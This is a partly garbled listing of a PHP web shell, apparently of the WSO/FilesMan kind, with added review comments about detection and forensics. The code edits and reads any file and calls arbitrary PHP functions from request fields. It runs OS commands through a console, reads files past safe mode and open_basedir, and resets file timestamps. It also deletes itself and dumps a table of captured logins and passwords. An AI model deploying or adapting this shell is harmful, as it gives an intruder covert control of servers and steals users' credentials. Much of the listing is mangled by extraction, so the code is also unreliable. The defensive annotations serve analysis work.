?>
function sa() {
for(i=0;i
NameSizeModifyOwner/GroupPermissionsActions";
$dirs = $files = $links = array();
$n = count($dirContent);
for($i=0;$i $dirContent[$i],
'path' => $GLOBALS['cwd'].$dirContent[$i],
'modify' => date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])),
'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]),
'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
'owner' => $ow['name']?$ow['name']fileowner($dirContent[$i]),
'group' => $gr['name']?$gr['name']filegroup($dirContent[$i])
);
if(@is_file($GLOBALS['cwd'].$dirContent[$i]))
$files[] = array_merge($tmp, array('type' => 'file'));
elseif(@is_link($GLOBALS['cwd'].$dirContent[$i]))
$links[] = array_merge($tmp, array('type' => 'link'));
elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != "."))
$dirs[] = array_merge($tmp, array('type' => 'dir'));
}
$GLOBALS['sort'] = $sort;
function cmp($a, $b) {
if($GLOBALS['sort'][0] != 'size')
return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]])*($GLOBALS['sort'][1]?1:-1);
else
return (($a['size'] '.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');">[ '.htmlspecialchars($f['name']).' ]').''.(($f['type']=='file')?viewSize($f['size']):$f['type']).''.$f['modify'].''.$f['owner'].'/'.$f['group'].''.$f['perms']
.'R T'.(($f['type']=='file')?' E D':'').'';
$l = $l?0:1;
}
?>
'>
'>
CopyMoveDeletePaste >">
String conversions';
$stringTools = array(
'Base64 encode' => 'base64_encode',
'Base64 decode' => 'base64_decode',
'Url encode' => 'urlencode',
'Url decode' => 'urldecode',
'Full urlencode' => 'full_urlencode',
'md5 hash' => 'md5',
'sha1 hash' => 'sha1',
'crypt' => 'crypt',
'CRC32' => 'crc32',
'ASCII to HEX' => 'ascii2hex',
'HEX to ASCII' => 'hex2ascii',
'HEX to DEC' => 'hexdec',
'HEX to BIN' => 'hex2bin',
'DEC to HEX' => 'dechex',
'DEC to BIN' => 'decbin',
'BIN to HEX' => 'bin2hex',
'BIN to DEC' => 'bindec',
'String to lower case' => 'strtolower',
'String to upper case' => 'strtoupper',
'Htmlspecialchars' => 'htmlspecialchars',
'String length' => 'strlen',
);
if(empty($_POST['ajax'])&&!empty($_POST['p1']))
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
echo "";
foreach($stringTools as $k => $v)
echo "".$k."";
echo ">'/> send using AJAX
".htmlspecialchars(@$_POST['p2'])."";
// Dispatch of the chosen "conversion": request field p1 is used as a function NAME and p2 as
// its single argument.
// NOTE(review): the only gate is function_exists(); p1 is never compared with the keys or values of
// the $stringTools map, so the call is not limited to the conversions listed there. A
// variable-function call on request data is a strong web-shell signature for code review and scanning.
if(!empty($_POST['p1'])) {
if(function_exists($_POST['p1']))
// The return value is HTML-escaped for display; the call itself has already run by then.
echo htmlspecialchars($_POST['p1']($_POST['p2']));
}
echo"";
?>
Search for hash:
File tools';
// p1 is a filesystem path taken directly from the request; the only check made is that it exists.
// NOTE(review): no restriction to a base directory is visible, so the view / highlight / chmod /
// edit / hexdump / rename / touch cases further down act on any path the PHP process can reach.
// Defender takeaway: what such a script can touch is bounded by the web server account's file
// permissions, not by anything in this code.
if( !file_exists(@$_POST['p1']) ) {
echo 'File not exists';
printFooter();
return;
}
$uid = @posix_getpwuid(@fileowner($_POST['p1']));
$gid = @posix_getgrgid(@fileowner($_POST['p1']));
echo 'Name: '.htmlspecialchars($_POST['p1']).' Size: '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' Permission: '.viewPermsColor($_POST['p1']).' Owner/Group: '.$uid['name'].'/'.$gid['name'].'
';
echo 'Create time: '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' Access time: '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' Modify time: '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'
';
if( empty($_POST['p2']) )
$_POST['p2'] = 'view';
if( is_file($_POST['p1']) )
$m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
else
$m = array('Chmod', 'Rename', 'Touch');
foreach($m as $v)
echo ''.((strtolower($v)==@$_POST['p2'])?'[ '.$v.' ]':$v).' ';
echo '
';
switch($_POST['p2']) {
case 'view':
echo '';
$fp = @fopen($_POST['p1'], 'r');
if($fp) {
while( !@feof($fp) )
echo htmlspecialchars(@fread($fp, 1024));
@fclose($fp);
}
echo '';
break;
case 'highlight':
if( is_readable($_POST['p1']) ) {
echo '';
$code = highlight_file($_POST['p1'],true);
echo str_replace(array(''), array(''),$code).'';
}
break;
case 'chmod':
if( !empty($_POST['p3']) ) {
$perms = 0;
for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
$perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
if(!@chmod($_POST['p1'], $perms))
echo 'Can\'t set permissions!
document.mf.p3.value="";';
else
die('g(null,null,null,null,"")');
}
echo '>">';
break;
case 'edit':
if( !is_writable($_POST['p1'])) {
echo 'File isn\'t writeable';
break;
}
if( !empty($_POST['p3']) ) {
@file_put_contents($_POST['p1'],$_POST['p3']);
echo 'Saved!
document.mf.p3.value="";';
}
echo '';
$fp = @fopen($_POST['p1'], 'r');
if($fp) {
while( !@feof($fp) )
echo htmlspecialchars(@fread($fp, 1024));
@fclose($fp);
}
echo '>">';
break;
case 'hexdump':
$c = @file_get_contents($_POST['p1']);
$n = 0;
$h = array('00000000
','','');
$len = strlen($c);
for ($i=0; $i'.$h[0].''.$h[1].''.htmlspecialchars($h[2]).'';
break;
case 'rename':
if( !empty($_POST['p3']) ) {
if(!@rename($_POST['p1'], $_POST['p3']))
echo 'Can\'t rename!
document.mf.p3.value="";';
else
die('g(null,null,"'.urlencode($_POST['p3']).'",null,"")');
}
echo '>">';
break;
case 'touch':
// Sets both the access and the modification time of the p1 path to a caller-chosen value
// (p3 parsed by strtotime()).
// NOTE(review): forensic caveat - on a host where a script like this has run, atime/mtime cannot be
// taken at face value. touch() does not let the caller pick the inode change time (ctime), so
// compare ctime, web server logs and backups when building a timeline.
if( !empty($_POST['p3']) ) {
$time = strtotime($_POST['p3']);
if($time) {
if(@touch($_POST['p1'],$time,$time))
die('g(null,null,null,null,"")');
else {
echo 'Fail!document.mf.p3.value="";';
}
} else echo 'Bad time format!document.mf.p3.value="";';
}
echo '>">';
break;
case 'mkfile':
break;
}
echo '';
printFooter();
}
/**
 * Request handler that tries several alternative ways of reading a file or listing a
 * directory named by the request: p1 selects the method (1-5 are visible here), p2 is the path.
 * Output is captured with ob_start().
 *
 * NOTE(review): this listing is extraction-damaged from the "case 5" line onward (text between
 * angle brackets was stripped), so only cases 1-4 can be described reliably.
 * Defender context: the handler titles itself "Safe mode bypass". safe_mode was removed in
 * PHP 5.4, and open_basedir is a hardening aid rather than a sandbox. The relevant controls are
 * a maintained PHP version, disable_functions and unloaded extensions for what the site does
 * not need, and OS-level isolation of the PHP process.
 */
function actionSafeMode() {
$temp='';
ob_start();
switch($_POST['p1']) {
case 1:
// Method 1: copy() from a compress.zlib:// URL built from p2 into a temp file, print it, delete it.
// NOTE(review): $test is not assigned anywhere in the visible function.
$temp=@tempnam($test, 'cx');
if(@copy("compress.zlib://".$_POST['p2'], $temp)){
echo @file_get_contents($temp);
unlink($temp);
} else
echo 'Sorry... Can\'t open file';
break;
case 2:
// Method 2: directory listing through glob() on p2 with a trailing wildcard.
$files = glob($_POST['p2'].'*');
if( is_array($files) )
foreach ($files as $filename)
echo $filename."\n";
break;
case 3:
// Method 3: cURL fetch of a file:// URL made of p2, a NUL byte and SELF_PATH.
// NOTE(review): the handle is never closed in the visible code.
$ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH);
curl_exec($ch);
break;
case 4:
// Method 4: puts the two ini settings back to their startup values, then include()s the p2 path.
// NOTE(review): include() executes any PHP the target file contains; it does not just print it.
ini_restore("safe_mode");
ini_restore("open_basedir");
include($_POST['p2']);
break;
case 5:
for(;$_POST['p2'] Safe mode bypass';
echo 'Copy (read file)>">
Glob (list dir)>">
Curl (read file)>">
Ini_restore (read file)>">
Posix_getpwuid ("Read" /etc/passwd)FromTo>">
Imap_open (read file)>">';
if($temp)
echo ''.$temp.'';
echo '';
printFooter();
}
/**
 * "Console" handler: passes the request field p1 to ex() (defined elsewhere in the file;
 * presumably it runs p1 as an OS command - confirm against its definition) and returns the
 * output, either as an AJAX payload or inside the rendered page.
 *
 * Detection notes grounded in this block: POST fields named p1, ajax and charset; an AJAX
 * response whose body is a decimal length, a newline, then JavaScript assigning to
 * document.cf.output.value; a session key formed from md5(Host header) followed by 'ajax'.
 * NOTE(review): the inline JavaScript and markup in the middle of the block were truncated
 * by the page extraction and are left as found.
 */
function actionConsole() {
if(isset($_POST['ajax'])) {
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
ob_start();
echo "document.cf.cmd.value='';\n";
// Prompt line plus ex() output, backslash-escaped for a single-quoted JavaScript string and
// converted from the client-named charset to UTF-8.
$temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\\'\0"));
// If p1 ends in "cd <dir>", PHP's own working directory is changed as well and reported to the form.
if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {
if(@chdir($match[1])) {
$GLOBALS['cwd'] = @getcwd();
echo "document.mf.c.value='".$GLOBALS['cwd']."';";
}
}
echo "document.cf.output.value+='".$temp."';";
echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;";
// Response framing: byte length of the buffered JavaScript, a newline, then the JavaScript itself.
$temp = ob_get_clean();
echo strlen($temp), "\n", $temp;
exit;
}
printHeader();
?>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array("");
var cur = 0;
function kp(e) {
var n = (window.Event) ? e.which : e.keyCode;
if(n == 38) {
cur--;
if(cur>=0)
document.cf.cmd.value = cmds[cur];
else
cur++;
} else if(n == 40) {
cur++;
if(cur
Console';
foreach($GLOBALS['aliases'] as $n => $v) {
if($v == '') {
echo '';
continue;
}
echo ''.$n.'';
}
if(empty($_POST['ajax'])&&!empty($_POST['p1']))
$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
echo '>"> send using AJAX
';
// Non-AJAX path: the same ex() call, with the output HTML-escaped into the page.
if(!empty($_POST['p1'])) {
echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1']));
}
echo '';
echo 'document.cf.cmd.focus();';
printFooter();
}
/**
 * Drops the session entry keyed by the md5 of the request's Host header and prints a
 * farewell string.
 *
 * NOTE(review): presumably that entry is the script's "logged in" marker - confirm against the
 * login code, which is not part of this listing. Only this one key is removed; the PHP session
 * itself is not destroyed.
 */
function actionLogout() {
$sessionKey = md5($_SERVER['HTTP_HOST']);
unset($_SESSION[$sessionKey]);
echo 'bye!';
}
/**
 * Self-deletion page: when the request field p1 equals 'yes', unlink()s the file named by
 * SELF_PATH and stops; otherwise (or on failure) renders a confirmation prompt.
 *
 * NOTE(review): the prompt string lost its markup in extraction and is left as found.
 * Forensic note: because the script can delete itself, its absence from disk is not evidence
 * that it was never there. Web server access logs (POST requests to the script's path),
 * file-integrity baselines and backups remain the sources to check.
 */
function actionSelfRemove() {
printHeader();
// Loose comparison (==) against the literal 'yes'.
if($_POST['p1'] == 'yes') {
if(@unlink(SELF_PATH))
die('Shell has been removed');
else
echo 'unlink error!';
}
echo 'SuicideReally want to remove the shell?
Yes';
printFooter();
}
/**
 * "Sniffer" page: connects to a MySQL server, selects every row of
 * jos_phocadownload_templates and prints the login, pass, ip, date, id and ref columns.
 *
 * The four connection literals are Russian-language placeholders left by the poster
 * (roughly: "order number here", "the database itself", "the user is written here",
 * "and the password"), not working credentials.
 * NOTE(review): a table with login / pass / ip / referer columns looks like a store of captured
 * logins rather than component data; what fills it is not shown in this listing. For
 * defenders, a table of that shape inside a CMS schema is worth treating as an indicator of
 * compromise.
 * NOTE(review): the row loop is extraction-damaged (the for() header lost its condition and
 * stray spaces sit inside identifiers) and is left as found. The mysql_* extension used here
 * was removed in PHP 7.0.
 */
function actionSniffer() {
printHeader();
echo 'Sniffer';
// Placeholder connection settings (see the translations in the header comment).
$host='сдесь номер заказа.mysql.ihc.ru';
$db='сама база_db';
$user='сдесь прописан пользователь_db';
$passwd='ну и пароль';
// Return values of the connect / select / query calls are not checked.
$link = mysql_connect($host, $user, $passwd);
mysql_select_db($db, $link);
$result=mysql_query("SELECT * FROM jos_phocadownload_templates");
$n=mysql_num_rows($result);
echo "";
// Column values are echoed as stored, with no htmlspecialchars() on the way out.
for($i=0;$i".' Login:',mysql_result($result,$ i,login),"".'Pass:',mysql_result($result,$i,pass), "".'IP:',mysql_result($result,$i,ip),"".'Date:',my sql_result($result,$i,date),"".'id:',mysql_result( $result,$i,id),"".'referer:',mysql_result($result, $i,ref),"";
echo "";
echo "";
mysql_close($link);
printFooter();
}[/I][/I]